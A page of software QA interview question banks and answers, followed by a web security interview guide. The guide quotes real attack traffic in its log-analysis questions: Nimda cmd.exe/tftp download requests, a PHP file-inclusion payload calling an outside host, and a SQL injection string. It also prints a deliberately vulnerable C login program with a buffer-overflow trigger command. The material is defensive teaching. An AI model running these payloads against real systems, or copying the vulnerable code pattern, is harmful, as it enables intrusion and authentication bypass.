testing interview question(qa)

Page 1: testing interview Question(QA)

Database Testing questions asked by Interviewer @IGATE

Below are a few database testing questions which were asked by the interviewer when I attended the IGATE walk-in drive.

Company: Patni Computer System (now iGATE)

Interview Type: Walk-in Drive

Date: 18th September 2010, Saturday

1. What is database testing, and what do we normally check for in database testing?
2. How do you test a database manually? Explain with an example.
3. What is a data-driven test?
4. How do you check whether a trigger has fired or not while doing database testing?
5. How do you test database procedures and triggers?
6. Is "a fast database retrieval rate" a testable requirement?
7. What SQL statements have you used in database testing?
8. What are the different joins? Give an example of each.
9. Can you delete a parent table record if a child table record exists? How?
10. What is referential integrity?
11. What is RowID?
12. How do you find out the database version?
13. How do you execute a SQL script in the query window?
14. How do you create a temporary variable?
15. How do you print an environment variable?
16. What is meant by a database user, and how is it different from a login?

Knowledge Work Book – Interview Question Bank (QA)

Company: Cybage Software [An SEI-CMMI Level 5 assessed & V1.3 Company] www.cybage.com

Interview Type: Walk-in/Referral walk-in

Date: 11th August 2012

Venue: CT1, Kalyaninagar, PUNE

Rakesh Hansalia (QA, Cybage, Gandhinagar) http://www.linkedin.com/in/rakeshhansalia

Below are the questions which were asked to the candidates in the walk-in interview for the QA position:


1) Describe yourself.
2) Describe your current project.
3) Which is the latest Android version?
4) What is the difference between Android 2.1 and Android 2.2?
5) OOPs concepts.
6) Difference between a class and an interface.
7) Different version control tools.
8) SQL queries?
9) Do you have any idea of joins in SQL?
10) Test case format?
11) What are smoke, regression and functional testing?
12) Bug life cycle?
13) What is equivalence partitioning?
14) How to identify an object in Selenium and QTP?
15) How to display a message in Selenium?
16) Different views in QTP.
17) Different modes in QTP.
18) What is a test automation framework?
19) What are the different types of automation frameworks?
20) How do you do security testing for an application?
21) What content do you include in a test status report?
22) How have you mentored your team? (This question is applicable if you have written in your CV that you have mentored.)
23) Have you prepared a test plan? If yes, then what content do you include in the test plan?

24) Would you like to ask any questions of us?
25) Describe application certification testing.
26) How do you do certification testing?
27) What role are you playing in your current company?
28) What are the differences and similarities between the mobile app which you are testing in your current project and the same app if you tested it on Windows?
29) Difference between System testing and Functional testing.
30) 3 most important test scenarios for a pen.
31) 3 least important test scenarios for a pen from the user's point of view.
32) Suppose 100 requirements are there; how will you estimate them?
33) Suppose 1000 test cases are there; will you run all 1000 test cases on all devices?
34) 3 assert commands.
35) Difference between Selenium WebDriver, RC and IDE.
36) Rate yourself for automation.
37) What are the components of QTP?
38) Do you have knowledge of SQL?
39) What is compatibility testing? Is compatibility testing functional or non-functional?
40) What is non-functional testing?
41) Relate usability and reliability to your current project.
42) Suppose somebody in your team is not comfortable with you and he/she does not tell anybody what he/she feels, but you know that your peer is not comfortable; then what will you do?
43) If you have mentioned hobbies in your resume, then they can ask you questions related to your hobbies.
44) Do you have any questions which you want to ask?
45) What is root cause analysis?
46) 3 scenarios for which you as a tester can't do root cause analysis or help the developer to know the reason for a bug?
47) Write a C program to create the pattern:

1
2 2
3  3  3

48) What is stdio.h?
49) What is a library?
50) Tell me the names of 3 libraries.
51) Tell me the names of 5 automation tools for mobile.
52) Suppose you are the only resource, the work is of 3 days and you have to complete it in 2 days; then what will you do?
53) Suppose you have to select a device for an application which should work on the latest as well as previous Android versions; then which device will you select?
54) What is polymorphism?

Interview Questions @ Polaris

a. Interview Date: 29-05-2010
b. Company Name: Polaris
c. Location: Hyderabad

I faced following questions in Polaris Interview.

1. Tell me about your current organization.
2. What is black box testing?
3. What is white box testing?
4. What is functional testing?
5. What is the difference between black box and functional testing?
6. What is a test plan?
7. What is a test strategy?
8. What is the difference between a test plan and a test strategy?
9. What is smoke testing?
10. What is sanity testing?
11. Who will perform smoke testing?
12. Explain the Agile process.
13. How much do you know about QTP? (I mentioned in my resume "Exposure on QTP")
14. Explain your current project.
15. What is the Requirement Traceability Matrix?
16. Can you draw the template for a Requirement Traceability Matrix?
17. What is ad-hoc testing?
18. What is the difference between retesting and regression testing?
19. Can you explain the bug life cycle?
20. How can you make sure whether all requirements are covered or not?
21. Can you explain the biggest complexity in your current project?
22. What is the difference between bug severity and priority?
23. Which bug tracking tool are you using?
24. Can you give one example of a high severity and low priority bug?
25. Can you give one example of a high priority and low severity bug?
26. What is security testing?

ValueLabs (Hyderabad) Manual Testing – Written test Questions and Answers

Time: 90 Minutes (25 Questions)

Prepared by Rakesh Hansalia

1) What is a composite primary key?

A primary key can consist of one or more columns of a table. When two or more columns are used as a primary key, they are called a composite key. Each single column's data can be duplicated, but the combination of values of these columns cannot be duplicated.

For example, if you have a Student table and a Course table, and one student can select many courses and one course can be selected by many students, this is a many-to-many relationship, so you need to create a third table to define the relationship, say it's called StudentCourse. It is important to note that you only need StudentID and CourseID in this table as a composite key. You do not need an extra identity ID column to uniquely identify each row, because an ID column alone is not sufficient: it cannot prevent the same student selecting the same course from being inserted into this table twice.


2) Difference between Table and View

Views are essentially logical table-like structures populated on the fly by a given query. The results of a view query are not stored anywhere on disk and the view is recreated every time the query is executed. Materialized views are actual structures stored within the database and written to disk. They are updated based on the parameters defined when they are created.

A view uses a query to pull data from the underlying tables.

A materialized view is a table on disk that contains the result set of a query.

3) Difference between ECP and BVA

In one line: ECP does not include the boundary values in the class partitions. E.g. if we have three classes of 1-20, 21-40 and 41-60, then in ECP we do not include the values 1, 20, 21, 40, 41 and 60, whereas in BVA we include them as well.

4) Difference between Test Scenario and Test Case

A test case is a condition which is executed for an expected output with a predefined set of steps and known inputs. Generally a test case has:

1) Precondition
2) Steps to execute
3) Input data
4) Expected output
5) Status (Pass/Fail)

A test scenario is a set of test cases. What this means: if you have to withdraw money from an ATM machine, then that is a scenario. But to withdraw money, you need to execute many test cases, provide many inputs, and you get many outputs and finally your money with a receipt of the transaction.

Test Scenario is ‘What to be tested’ and Test Case is ‘How to be tested’.

5) Explain V-model

6) High priority test cases for ATM application

1. Machine accepts the ATM card
2. Machine rejects an expired card
3. Successful entry of PIN number
4. Unsuccessful operation due to entering a wrong PIN number 3 times
5. Successful selection of language
6. Successful selection of account type
7. Unsuccessful operation due to invalid account type
8. Successful selection of amount to be withdrawn
9. Successful withdrawal
10. Expected message when the amount is greater than the daily limit
11. Unsuccessful withdraw operation due to lack of money in the ATM
12. Expected message when the amount to withdraw is greater than the available balance
13. Unsuccessful withdraw operation due to clicking cancel after inserting the card
14. Check the ATM machine is able to print receipts
15. Withdrawal amount should be in multiples of 100

7) Different DDL and DML commands

Data Definition Language (DDL) is a computer language used to define data structures [ALTER, COMMENT, DROP, CREATE].

The most popular form of DML is the Structured Query Language (SQL). This is a language used for databases, designed specifically for managing data in relational database management systems (RDBMS) [UPDATE, DELETE, LOCK, INSERT, SELECT].

9) Are functional testing and system testing the same?

I would say no, they are not the same.

- System testing is testing of the application as a whole, whereas functional testing is testing of the application's functionality.

- System testing is one of the phases of testing in the SDLC. For example, in a typical V-model, unit testing is performed in the development phase, followed by integration testing, and when the software is ready it is deployed to the QA environment to perform "system testing".

System testing is end-to-end application testing.


Functional testing is a type of testing. It means testing the various functionalities of the application (individual or integrated); the other type is non-functional.

In the system testing phase both functional and non-functional testing are performed.

- Most people think functional testing and system testing are the same, but they differ slightly in that functional testing verifies software by checking it against the designed specification documents, while system testing validates software by checking it against the user requirements.

10) Bug life cycle states

Open, Fixed, Closed, Reopen, Obsolete

11) Tell me 3 different Software Configuration Management Tools

http://www.software-pointers.com/en-configuration-tools.html

I've used VSS (Visual SourceSafe from Microsoft) & Tortoise when I was in iGATE Patni, Gandhinagar.

12) Difference between bug, error, defect

Bug : It is found in the development environment before the product is shipped to the respective customer.

Error : It is the Deviation from actual and the expected value.

Defect : It is found in the product itself after it is shipped to the respective customer.

13) What are the test deliverables in the SDLC, and when to deliver which document?

Test Cases Documents
Test Plan
Testing Strategy
Test Scripts
Test Data
Test Traceability Matrix
Test Results/Reports
Test Summary Report
Install/Config Guides
Defect Report
Release Notes

14) Tell me the concepts present in Test plan.

Refer this link : http://rakeshhansalia.wordpress.com/2012/05/14/test-plan-preparation-for-manual-testing/

15) What are the main issues found in browser compatibility testing?

Alignment issues, JS errors, Image display problems, Ajax issue

16) Bug life cycle

New bug found > QA logs a bug (Open state) > DEV fixes the bug (Fixed state) > QA tests it (Closed if OK, or Reopen if it fails)

17) Which is a test case optimization method?

1) BVA 2) Functional testing 3) Incremental testing 4) Big bang

Ans: BVA (Boundary Value Analysis)

18) Difference between the DELETE and TRUNCATE commands

- DELETE and TRUNCATE are both logged operations, but DELETE is logged on a per-row basis and TRUNCATE logs the deallocation of the data pages in which the data exists. You can't roll back data in TRUNCATE, but in DELETE you can roll back data. TRUNCATE removes (deletes) the records permanently.

- You cannot TRUNCATE a table that has any foreign key constraints. You will have to remove the constraints, TRUNCATE the table, and reapply the constraints.

19) Integration testing would be done after system testing.

a) true b) false

Ans: False

20) What is a static method?

There are two types of methods.

Instance methods are associated with an object and use the instance variables of that object. This is the default.

Static methods use no instance variables of any object of the class they are defined in. If you define a method to be static, you will be given a rude message by the compiler if you try to access any instance variables. You can access static variables, but except for constants, this is unusual. Static methods typically take all their data from parameters and compute something from those parameters, with no reference to instance variables. This is typical of methods which do some kind of generic calculation. A good example of this is the many utility methods in the predefined Math class.

Web Security Interview Questions

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions.  These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.

Entry Level Questions

1. What do you see as the most critical and current threats affecting Internet accessible websites?

Goal of question – To gauge the applicant's knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

2.   What online resources do you use to keep abreast of web security issues?  Can you give an example of a recent web security vulnerability or threat?

 

Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT.  Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.


3. What do you see as challenges to successfully deploying/monitoring web intrusion detection?

Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:

- Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
- Proper logging – increasing the verboseness of logging (Mod_Security audit_log)
- Remote centralized logging
- Alerting mechanisms
- Updating signatures/policies

4. What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?

Goal of question – This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technological topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help – http://www.webappsec.org/glossary.html

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client.  The web server is merely used as a conduit for the XSS data to be presented to the end client. See also “Client-Side Scripting”.

5. What are the most important steps you would recommend for securing a new web server? Web application?

Goal of question – Once again, there is no right or wrong answer; however, we are interested in what the applicant views as important.

Web Server Security:

- Update/patch the web server software
- Minimize the server functionality – disable extra modules
- Delete default data/scripts
- Increase logging verboseness
- Update permissions/ownership of files

Web Application Security:

- Make sure input validation is enforced within the code – security QA testing
- Configure it to display generic error messages
- Implement a software security policy
- Remove or protect hidden files and directories

Advanced Level Questions

1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server. What do the log entries below suggest has happened? What would you do in response to these entries?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

 

Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

You could use either Microsoft's Internet Security and Acceleration (ISA) Server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

2. You are engaged in a penetration test where you are attempting to gain access to a protected location. You are presented with this login screen:

What are some examples of how you would attempt to gain access?


Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities.  They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ‘ OR 1=1#).  If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.

 

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2"
SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is: K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

This error message indicates that the target web application is running Microsoft SQL Server and discloses directory structures.

 

 

3. What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 -0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: http://www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

 

 

Goal of question – To verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the request. This attack was not successful for the following two reasons:

- The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.

- The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

 

4. One of your web servers is logging multiple requests similar to the following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"

What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?

Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT method) as well as the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule –

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)
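Question 1 (the Nimda entries) and this question (the PUT entry) both come down to the same defender's task: pull the client address, method, path and status code out of a CLF line and decide what they mean. The parser and classifier below is an added example written for this page, not code from the original document, from Apache or from Mod_Security. It runs over the page's own three log lines plus one constructed benign request, and it turns the page's "inspect the back-end IIS server" reasoning (a cmd.exe probe answered with 200, followed by the worm's tftp stage) into a check that returns a value instead of leaving it to the reader of the log. The field widths, the CLF_* labels and the benign line are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Fields of one Common Log Format (CLF) entry that the checks below need. */
typedef struct {
    char ip[64];
    char method[16];
    char path[512];
    int  status;
} clf_entry;

/* Parse one CLF line: host, two identity fields, [timestamp], "METHOD PATH PROTO", status.
   Returns 1 on success, 0 otherwise. Paths containing spaces and request lines without a
   protocol token are not handled; they are reported as unparsed rather than guessed at. */
int parse_clf(const char *line, clf_entry *e)
{
    memset(e, 0, sizeof *e);
    int n = sscanf(line, "%63s %*s %*s [%*[^]]] \"%15s %511s %*[^\"]\" %d",
                   e->ip, e->method, e->path, &e->status);
    return n == 4;
}

enum clf_finding { CLF_BENIGN, CLF_NIMDA_PROBE, CLF_NIMDA_TFTP_STAGE, CLF_PUT_UPLOAD };

/* A PUT is an upload/defacement attempt whatever the status code. A request for cmd.exe
   through a traversal path is the Nimda-style probe; the same request carrying "tftp" is
   the worm's second stage, which it only sends after a probe was answered with 200. */
enum clf_finding classify(const clf_entry *e)
{
    if (strcmp(e->method, "PUT") == 0)
        return CLF_PUT_UPLOAD;
    if (strstr(e->path, "cmd.exe") != NULL)
        return strstr(e->path, "tftp") != NULL ? CLF_NIMDA_TFTP_STAGE : CLF_NIMDA_PROBE;
    return CLF_BENIGN;
}

typedef struct {
    int probes_ok;     /* cmd.exe probes the back end answered with 200 */
    int tftp_stages;   /* second-stage requests seen */
    int put_attempts;  /* PUT requests, any status */
    int unparsed;      /* lines the parser rejected; never drop these silently */
} clf_summary;

clf_summary scan_log(const char *const *lines, size_t count)
{
    clf_summary s = {0, 0, 0, 0};
    for (size_t i = 0; i < count; i++) {
        clf_entry e;
        if (!parse_clf(lines[i], &e)) { s.unparsed++; continue; }
        switch (classify(&e)) {
        case CLF_NIMDA_PROBE:      if (e.status == 200) s.probes_ok++; break;
        case CLF_NIMDA_TFTP_STAGE: s.tftp_stages++; break;
        case CLF_PUT_UPLOAD:       s.put_attempts++; break;
        case CLF_BENIGN:           break;
        }
    }
    return s;
}

/* The page's conclusion for question 1: the probe got a 200 and the worm moved on to its
   tftp stage, so the proxied IIS host has to be checked even though Apache is unaffected. */
int backend_needs_inspection(const clf_summary *s)
{
    return s->probes_ok > 0 && s->tftp_stages > 0;
}

/* The three entries quoted on this page plus one constructed benign request (last line). */
static const char *const SAMPLE_LOG[] = {
    "68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 200 566 \"-\" \"-\"",
    "68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] \"GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\\\httpodbc.dll HTTP/1.0\" 200 566 \"-\" \"-\"",
    "201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] \"PUT /hacked.htm HTTP/1.0\" 403 769 \"Microsoft Data Access Internet Publishing Provider DAV 1.1\" \"-\"",
    "10.0.0.5 - - [26/Dec/2004:02:00:00 -0500] \"GET /index.html HTTP/1.1\" 200 1043 \"-\" \"Mozilla/5.0\"",
};

size_t sample_log_count(void) { return sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]; }

/* Accessors over SAMPLE_LOG used by main() and by tests. */
int parses(const char *line) { clf_entry e; return parse_clf(line, &e); }
int sample_finding(size_t i) { clf_entry e; return parse_clf(SAMPLE_LOG[i], &e) ? (int)classify(&e) : -1; }
int sample_status(size_t i)  { clf_entry e; return parse_clf(SAMPLE_LOG[i], &e) ? e.status : -1; }
int sample_fields_are(size_t i, const char *ip, const char *method, const char *path)
{
    clf_entry e;
    return parse_clf(SAMPLE_LOG[i], &e) && strcmp(e.ip, ip) == 0 &&
           strcmp(e.method, method) == 0 && strcmp(e.path, path) == 0;
}
int inspection_needed_for_sample(void)
{
    clf_summary s = scan_log(SAMPLE_LOG, sample_log_count());
    return backend_needs_inspection(&s);
}

int main(void)
{
    clf_summary s = scan_log(SAMPLE_LOG, sample_log_count());
    printf("probes answered 200: %d, tftp stages: %d, PUT attempts: %d, unparsed: %d\n",
           s.probes_ok, s.tftp_stages, s.put_attempts, s.unparsed);
    printf("inspect back-end IIS host: %s\n", backend_needs_inspection(&s) ? "yes" : "no");
    return 0;
}
```

Two points the code makes that the prose only implies: the status code of the probe is part of the signal (a 404 on the cmd.exe probe would not trigger the tftp stage), and CLF records nothing about the PUT body, so a 403 on /hacked.htm tells you an upload was attempted but not what it contained; that is why the page reaches for a Snort rule on the wire rather than a log rule.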

 

 

5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this –

"GET /cgi-bin/logon_validate?login=test&password=test"

The source code is shown below –

 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* GOOD_USER and GOOD_PASS are not defined in the quiz listing; placeholder
   values so that the program compiles. */
#define GOOD_USER "test"
#define GOOD_PASS "test"

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth='1';   /* '1' = not authenticated; declared right before user[] */
    char user[128];
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;
    /* The listing reads ****QUERY_STRING****; for a CGI program this is the
       QUERY_STRING environment variable. */
    char *query_string=getenv("QUERY_STRING");

    if (query_string==NULL)
        show_error();

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(query_string,"login=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=6;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end==NULL)
        show_error();
    *(ch_ptr_end++)='\0';
    strcpy(user,ch_ptr_begin);   /* unbounded copy into a 128-byte buffer */

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=9;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end!=NULL) *(ch_ptr_end++)='\0';
    strcpy(pass,ch_ptr_begin);   /* unbounded copy into a 128-byte buffer */

    if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0))
        error_on_auth='0';

    if (error_on_auth=='0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }

    // return(0); hehe could be evil ;PPPPP
    exit(0);
}

 

 

This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php


 

Do you see any problems with this script?  How could an attacker exploit this script to bypass the authentication mechanisms in this script?  What are some mitigation options?

 

Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.

 

Reference “Smashing The Stack For Fun And Profit” for technical details –

http://www.phrack.org/phrack/49/P49-14

 

The security issue with this script has to do with a buffer overflow problem in the way that the script is using the "error_on_auth" condition. The error_on_auth condition is initially declared to be "1", which means that the user is not authenticated. The "user" condition was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack. The result is that if the attacker submits a username that is 129 bytes (with the last byte being "0"), they can overwrite the error_on_auth data. A Unix command such as the following would achieve this goal –

http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

or

# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e 'print "0"x129'`

 

Mitigation options include the following:

- Update the validate_logon source code to fix the problem, such as using strncpy() instead of strcpy().

- If the source code could not be updated, then security filters would need to be implemented on the web server. Using Mod_Security, you could implement some security filters for the "validate_logon" URL such as these:

o Only allow letters in the username argument. This would prevent the client from overwriting the error_on_auth data with a zero.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
</Location>

o You could also add another rule to restrict the size of the username/password arguments to less than 129 characters.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
SecFilterSelective ARG_LOGIN|ARG_PASSWORD ".{129,}"
</Location>

- A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as "anomalous" and deny them. A brief listing of WAF vendors includes Teros, NetContinuum, Imperva, Watchfire, Breach, Axiliance, and others.
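The first mitigation option above, the source-level fix, as an added example; this is not code from the page or from the NGSec quiz. It parses the same login=/password= query string the vulnerable listing does, but measures each value before copying it and refuses anything that does not fit the 128-byte buffer (terminator included) instead of truncating it silently, which is the usual pitfall of a bare strncpy(). It also applies the page's letters-only rule to every character of the login; note that the `!^[a-zA-Z]` filter as written only constrains the first character. The credentials in the test and the FIELD_MAX name are assumptions of this example; like the original, parameters are found by substring search rather than by splitting the query string on "&".

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define FIELD_MAX 128   /* same buffer size as the original user[] and pass[] */

/* Copy the value following `key` (e.g. "login=") out of a query string into out[outlen].
   Where the original did strcpy() into a fixed buffer, this measures first and rejects a
   value that would not fit together with its terminator.
   Returns 0 on success, -1 if the key is absent, -2 if the value is too long. */
int get_query_param(const char *qs, const char *key, char *out, size_t outlen)
{
    const char *p = strstr(qs, key);
    if (p == NULL)
        return -1;
    p += strlen(key);
    const char *end = strchr(p, '&');
    size_t len = end != NULL ? (size_t)(end - p) : strlen(p);
    if (len >= outlen)
        return -2;
    memcpy(out, p, len);
    out[len] = '\0';
    return 0;
}

/* Letters only and non-empty: the rule the page's Mod_Security filter is meant to
   express, applied to the whole value rather than just its first character. */
int is_alpha_only(const char *s)
{
    if (*s == '\0')
        return 0;
    for (; *s != '\0'; s++)
        if (!isalpha((unsigned char)*s))
            return 0;
    return 1;
}

/* 1 = credentials present, well-formed and matching; 0 otherwise. The decision is the
   return value of the comparison, not a flag stored next to the buffers, so there is
   nothing adjacent on the stack for an over-long input to flip, and the buffers are
   never written past their end in the first place. */
int validate_logon(const char *query_string, const char *good_user, const char *good_pass)
{
    char user[FIELD_MAX];
    char pass[FIELD_MAX];
    if (get_query_param(query_string, "login=", user, sizeof user) != 0)
        return 0;
    if (get_query_param(query_string, "password=", pass, sizeof pass) != 0)
        return 0;
    if (!is_alpha_only(user))
        return 0;
    return strcmp(user, good_user) == 0 && strcmp(pass, good_pass) == 0;
}

/* The page's test input, constructed here: a login of 129 characters followed by a
   valid password. Returns 1 when the hardened routine rejects it. */
int long_login_rejected(void)
{
    char qs[FIELD_MAX + 64];
    memcpy(qs, "login=", 6);
    memset(qs + 6, '0', FIELD_MAX + 1);
    strcpy(qs + 6 + FIELD_MAX + 1, "&password=test");
    return validate_logon(qs, "test", "test") == 0;
}

int main(void)
{
    /* "test"/"test" are placeholder credentials for the demonstration. */
    printf("valid credentials:        %d\n", validate_logon("login=test&password=test", "test", "test"));
    printf("wrong password:           %d\n", validate_logon("login=test&password=nope", "test", "test"));
    printf("129-byte login rejected:  %d\n", long_login_rejected());
    return 0;
}
```

Rejecting rather than truncating matters for a credential check: a truncated login could silently compare equal to a shorter valid username, so the over-long request should fail closed and be logged, not be quietly shortened and then authenticated.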

 

 


 

Software Testing General Interview Questions

Q1. Difference between error, bug, defect, fault, failure?

Error: Errors are basically the deviation from the requirement, caught by testers and caused by misunderstanding by the developers. In other words, you can say a coding problem or a problem caused by wrong coding practice.

Bug: If the error found by testers is accepted as an error by the developers, then the error will be called a bug. It may be functional or load-related.

Defect: Suppose any product/software is currently running as a beta version in the market/client side. Any issue caught in that application that deviates the actual result from the requirement will be taken as a defect.

Fault: When the product/software is successfully launched in the market and running properly, but for any reason works unexpectedly, it is called a fault.

Failure: If the product fails to fulfil the requirement, then it is called a failure.

Q2. What is validation and verification?

Validation: Better known as testing; the process includes system testing, system integration testing, sub-system integration testing and unit testing. Black box testing will be used in validation.

Verification: conducting reviews on documents like BRS, SRS, HLDS and LLDS is called verification. Validation: executing the test cases and observing whether the actual result is equal to the expected result.

Q3. Explain the software test life cycle.

STLC basically consists of five stages: 1) Planning and control 2) Analysis and design 3) Implementation and execution 4) Evaluating exit criteria and reporting 5) Test closure.

In other words you can also say: requirement gathering, test design, test plan, bug reporting, regression testing and closure. Explain briefly each and every step.

Q4. Explain buglife cycle?

New, Open, Assigned, Fixed, Reopen and Closed.

New: when the tester raises the bug, the status is New.

Open: if the bug is genuine, the lead changes the status to Open.

Assigned: assigned to the developer.

Fixed: the developer fixes the bug and changes the status to Fixed.

Reopen: after regression or retesting, the tester decides whether the bug is Closed or Reopened.

Closed: fixed by the developer, reviewed by the tester and closed.

Q5. What are software testing methodologies?

These are some of the commonly used test methodologies:

1. Waterfall model
2. V model
3. Spiral model
4. Rational Unified Process (RUP)
5. Agile model
6. Rapid Application Development (RAD)

Explain whichever one your current company follows.

Q6. What is a traceability matrix?

A traceability matrix is a document in which we map the test cases to the requirements. In general, we check whether the application works as per the requirements and whether we have covered all the required functionality through test cases.

Q7. What is performance testing?

Performance testing is testing performed to ascertain how the components of a system perform in a given situation. Resource usage, scalability and reliability of the product are also validated under this testing. It is a subset of performance engineering, which focuses on addressing performance issues in the design and architecture of a software product.

Q8. What kinds of testing are performed in mobile application testing?

Functional testing – This type of testing ignores the internal parts and focuses on whether the output is as per the requirement. Black-box testing geared to the functional requirements of an application.

System testing – The entire system is tested as per the requirements. Black-box testing based on the overall requirements specification; it covers all combined parts of a system.


Incremental integration testing – A bottom-up approach, i.e. continuous testing of an application as new functionality is added. Application functionality and modules should be independent enough to test separately. Done by programmers or by testers.

